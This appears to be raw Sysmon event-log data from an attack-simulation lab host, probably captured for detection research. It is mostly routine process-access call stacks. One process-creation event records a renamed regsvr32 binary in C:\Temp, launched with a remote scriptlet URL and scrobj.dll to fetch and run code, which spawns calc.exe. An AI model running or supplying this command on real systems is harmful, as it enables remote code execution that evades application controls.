22:13:28.241{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1f822|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361641Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.241{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d419|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 10341000x8000000000000000361640Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.241{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+28a17|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 13241300x8000000000000000361639Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:13:28.241{8e433fbf-3708-6013-b403-000000001100}4072C:\Windows\system32\cmd.exeHKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1117338214-1411020952-3261875682-500\\Device\HarddiskVolume2\Windows\System32\cmd.exeBinary Data 10341000x8000000000000000361638Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.241{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+3b14c|C:\Windows\system32\twinui.pcshell.dll+3afee|C:\Windows\system32\twinui.pcshell.dll+3ba1c|C:\Windows\system32\twinui.pcshell.dll+135ae|C:\Windows\system32\twinui.pcshell.dll+131c0|C:\Windows\system32\twinui.pcshell.dll+27787|C:\Windows\system32\twinui.pcshell.dll+ec44|C:\Windows\system32\twinui.pcshell.dll+e30d|C:\Windows\system32\twinui.pcshell.dll+d04a|C:\Windows\system32\twinui.pcshell.dll+cbfd|C:\Windows\system32\twinui.pcshell.dll+80d00|C:\Windows\system32\twinui.pcshell.dll+17896|C:\Windows\system32\twinui.pcshell.dll+1a7ae|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2 10341000x8000000000000000361637Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.225{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361636Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.225{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361635Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.225{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361634Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.225{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361633Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.225{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361632Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.225{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361631Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.225{8e433fbf-3378-6013-6702-000000001100}29326308C:\Windows\system32\csrss.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000361630Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.225{8e433fbf-3708-6013-b503-000000001100}1045210372C:\Temp\notregsvr32.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Windows\System32\windows.storage.dll+14c4a6|C:\Windows\System32\windows.storage.dll+14ccc3|C:\Windows\System32\windows.storage.dll+14c2e8|C:\Windows\System32\windows.storage.dll+14c113|C:\Windows\System32\windows.storage.dll+14be0d|C:\Windows\System32\windows.storage.dll+13d1d8|C:\Windows\System32\windows.storage.dll+14d6dd|C:\Windows\System32\windows.storage.dll+15bf79|C:\Windows\System32\SHELL32.dll+3ec1e|C:\Windows\System32\SHELL32.dll+41755|C:\Windows\System32\SHELL32.dll+c014e|C:\Windows\System32\shcore.dll+2dce5|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000361629Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.232{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe10.0.18362.1 (WinBuild.160101.0800)Windows CalculatorMicrosoft® Windows® Operating SystemMicrosoft CorporationCALC.EXE"C:\Windows\System32\calc.exe" C:\Users\ADMINI~1\AppData\Local\Temp\IP-0A000111\Administrator{8e433fbf-337a-6013-b5aa-3d0000000000}0x3daab52HighMD5=F88CC05134C555D4E1CD1DEF78162A9A,SHA256=A103A57D50B32469C5811E2808F021ADF9D9220093B540B8A9C83B5C821D370E,IMPHASH=8EEAA9499666119D13B3F44ECD77A729{8e433fbf-3708-6013-b503-000000001100}10452C:\Temp\notregsvr32.exeC:\Temp\notregsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll 10341000x8000000000000000361628Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.225{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361627Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.225{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361626Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.210{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+3b14c|C:\Windows\system32\twinui.pcshell.dll+3afee|C:\Windows\system32\twinui.pcshell.dll+3ba1c|C:\Windows\system32\twinui.pcshell.dll+135ae|C:\Windows\system32\twinui.pcshell.dll+131c0|C:\Windows\system32\twinui.pcshell.dll+20cec|C:\Windows\system32\twinui.pcshell.dll+1003d|C:\Windows\system32\twinui.pcshell.dll+c179b|C:\Windows\system32\twinui.pcshell.dll+d04a|C:\Windows\system32\twinui.pcshell.dll+cbfd|C:\Windows\system32\twinui.pcshell.dll+80d00|C:\Windows\system32\twinui.pcshell.dll+17896|C:\Windows\system32\twinui.pcshell.dll+1a7ae|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2 10341000x8000000000000000361625Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.210{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\system32\twinui.pcshell.dll+22359|C:\Windows\system32\twinui.pcshell.dll+20684|C:\Windows\system32\twinui.pcshell.dll+ff1f|C:\Windows\system32\twinui.pcshell.dll+c179b|C:\Windows\system32\twinui.pcshell.dll+d04a|C:\Windows\system32\twinui.pcshell.dll+cbfd|C:\Windows\system32\twinui.pcshell.dll+80d00|C:\Windows\system32\twinui.pcshell.dll+17896|C:\Windows\system32\twinui.pcshell.dll+1a7ae|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed 10341000x8000000000000000361624Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.210{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361623Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.210{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\system32\twinui.pcshell.dll+22359|C:\Windows\system32\twinui.pcshell.dll+20684|C:\Windows\system32\twinui.pcshell.dll+ff1f|C:\Windows\system32\twinui.pcshell.dll+c179b|C:\Windows\system32\twinui.pcshell.dll+d04a|C:\Windows\system32\twinui.pcshell.dll+cbfd|C:\Windows\system32\twinui.pcshell.dll+80d00|C:\Windows\system32\twinui.pcshell.dll+17896|C:\Windows\system32\twinui.pcshell.dll+1a7ae|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b 10341000x8000000000000000361622Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.210{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361621Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.210{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361620Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.210{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361619Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.210{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361618Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.194{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361617Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.194{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361616Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.194{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program 